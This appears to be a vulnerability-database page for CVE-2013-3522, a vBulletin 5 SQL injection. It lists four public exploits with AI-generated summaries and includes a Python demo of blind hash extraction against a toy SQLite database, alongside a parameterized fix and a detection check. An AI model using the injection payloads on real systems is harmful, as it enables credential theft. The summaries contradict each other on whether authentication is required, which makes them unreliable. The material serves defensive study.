CVE-2013-3522

EXPLOITED

vBulletin 5.0.0 Beta 11 and earlier - Authenticated SQL Injection via nodeid Parameter

Title source: llm

Exploitation Summary

CVE-2013-3522 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 4 public exploits from researchers including Metasploit, Orestis Kourides, sinn3r and juan vazquez, among them the Metasploit modules auxiliary/gather/vbulletin_vote_sqli and exploits/unix/webapp/vbulletin_vote_sqli_exec.

AI-analyzed exploit summary

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract user credentials and deploy a PHP payload via admin panel access. It automates the process of brute-forcing node IDs, extracting user data, and installing a malicious product.

Description

SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.

Exploits (4)

exploitdb · WORKING POC · VERIFIED
by Metasploit · ruby · remote · php
https://www.exploit-db.com/exploits/30212

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract user credentials and deploy a PHP payload via admin panel access. It automates the process of brute-forcing node IDs, extracting user data, and installing a malicious product.

Classification: Working PoC 95% · Attack Type: SQLi · Complexity: Moderate · Reliability: Reliable
Target: vBulletin 5.0.0 Beta 11-28
No auth needed
Prerequisites: Access to the target vBulletin instance · Valid node ID or range for brute-forcing
devstral-2 · analyzed Feb 16, 2026
exploitdb · WORKING POC · VERIFIED
by Orestis Kourides · perl · webapps · php
https://www.exploit-db.com/exploits/24882

This exploit targets a SQL injection vulnerability in vBulletin 5 Beta versions 11-28. It authenticates with provided credentials and then sends a maliciously crafted POST request to trigger a blind SQLi, extracting the database version.

Classification: Working PoC 95% · Attack Type: SQLi · Complexity: Moderate · Reliability: Reliable
Target: vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28
Auth required
Prerequisites: Valid vBulletin credentials · Target running vulnerable vBulletin version
devstral-2 · analyzed Feb 16, 2026
metasploit · WORKING POC
by Orestis Kourides, sinn3r, juan vazquez · ruby · poc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/vbulletin_vote_sqli.rb

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract usernames and password hashes. It uses a brute-force approach to find a valid node ID and then performs SQLi to dump credentials.

Classification: Working PoC 100% · Attack Type: SQLi · Complexity: Moderate · Reliability: Reliable
Target: vBulletin 5
No auth needed
Prerequisites: Access to the vBulletin instance · Valid node ID or range to brute-force
devstral-2 · analyzed Feb 16, 2026
metasploit · WORKING POC · EXCELLENT
by Orestis Kourides, juan vazquez · ruby · poc · php
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb

This Metasploit module exploits a SQL injection vulnerability in vBulletin 5 to extract user credentials and deploy a PHP payload via admin panel access. It uses a time-based blind SQLi technique to extract data and leverages stolen credentials for authentication.

Classification: Working PoC 95% · Attack Type: SQLi · Complexity: Moderate · Reliability: Reliable
Target: vBulletin 5.0.0 Beta 11-28
No auth needed
Prerequisites: Access to the target vBulletin instance · Valid node ID or range for brute-forcing
devstral-2 · analyzed Feb 16, 2026
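The Description and the four exploit entries describe the nodeid injection only in prose. The following Python is an added example written for this page; it is not vBulletin code and not any of the Metasploit or exploit-db modules listed above. It builds an in-memory SQLite stand-in with constructed user and node rows, shows the CWE-89 pattern (nodeid pasted into the query) next to a validated, parameterized handler, sweeps a node-id range the way the modules brute-force a valid node, and extracts a password hash one hex digit at a time. The modules do that inference through time delays; SQLite has no SLEEP(), so the oracle here is whether the injected AND clause keeps the vote row visible. The table and column names, the hash values, the 16-digit hash length and the vote_* function names are assumptions.

```python
import re
import sqlite3

NODEID_OK = re.compile(r"[0-9]+")  # the only shape a legitimate nodeid ever has


def build_db():
    """Constructed stand-in for the forum database (assumed schema, made-up rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE node (nodeid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)",
                     [(1, "admin", "5f4dcc3b5aa765d9"), (2, "bob", "deadbeef00112233")])
    conn.executemany("INSERT INTO node VALUES (?, ?)",
                     [(42, "first post"), (43, "reply")])
    conn.commit()
    return conn


def vote_vulnerable(conn, nodeid):
    """CWE-89 pattern: the request parameter is concatenated straight into SQL."""
    sql = "SELECT title FROM node WHERE nodeid = " + nodeid
    return conn.execute(sql).fetchall()


def vote_hardened(conn, nodeid):
    """Fix: reject anything that is not a bare integer, then bind it as a parameter."""
    if NODEID_OK.fullmatch(nodeid) is None:
        raise ValueError("nodeid must be an integer")
    return conn.execute("SELECT title FROM node WHERE nodeid = ?", (int(nodeid),)).fetchall()


def hardened_rejects(conn, nodeid):
    """True when the hardened handler refuses the value."""
    try:
        vote_hardened(conn, nodeid)
    except ValueError:
        return True
    return False


def find_valid_node(conn, lo, hi):
    """Node-id sweep as the modules do: first id in [lo, hi] the endpoint accepts."""
    for candidate in range(lo, hi + 1):
        if vote_vulnerable(conn, str(candidate)):
            return candidate
    return None


def infer_hash(conn, nodeid, userid, length):
    """Blind extraction: one yes/no question per hex digit of the stored hash.
    The oracle is whether the row for a known-good nodeid is still returned
    once the injected AND clause is appended (boolean stand-in for SLEEP())."""
    out = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            payload = (f"{nodeid} AND substr((SELECT password FROM user "
                       f"WHERE userid={userid}),{pos},1)='{c}'")
            if vote_vulnerable(conn, payload):
                out += c
                break
    return out


def is_suspicious_nodeid(value):
    """Detection check for a WAF rule or request log: any nodeid that is not a bare integer."""
    return NODEID_OK.fullmatch(value) is None


if __name__ == "__main__":
    db = build_db()
    node = find_valid_node(db, 1, 100)
    print("valid node:", node)
    print("admin hash via vulnerable handler:", infer_hash(db, node, 1, 16))
    print("hardened handler rejects payload:", hardened_rejects(db, f"{node} AND 1=1"))
```

Note that the request is a POST, so the nodeid value lives in the body, not in the access-log URL; the is_suspicious_nodeid check has to run where the body is visible (WAF, reverse proxy with body inspection, or the application itself).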

References (2)

Core References (2)
Exploit (exploit-db): http://www.exploit-db.com/exploits/24882
Third Party Advisory, VDB Entry (OSVDB): http://www.osvdb.org/92031

Scores

EPSS 0.5635
EPSS Percentile 98.2%

Details

VulnCheck KEV 2013-12-11
CWE
CWE-89
Status published
Products (1)
vbulletin/vbulletin 5.0.0 beta_11 (2 CPE variants)
Published May 10, 2013
Tracked Since Feb 18, 2026